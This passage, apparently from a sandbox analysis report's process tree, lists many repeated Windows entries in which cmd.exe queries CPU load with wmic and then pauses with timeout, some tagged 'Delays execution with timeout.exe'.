    wmic cpu get loadpercentage
    3⤵
    PID:2228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1812
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3684
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:72
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4244
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4284
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2492
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3248
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2392
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3484
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3576
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3168
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4984
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1328
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4876
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3844
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1860
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4984
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1572
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2568
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3296
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:576
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4548
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3164
- C:\Windows\system32\timeout.exe
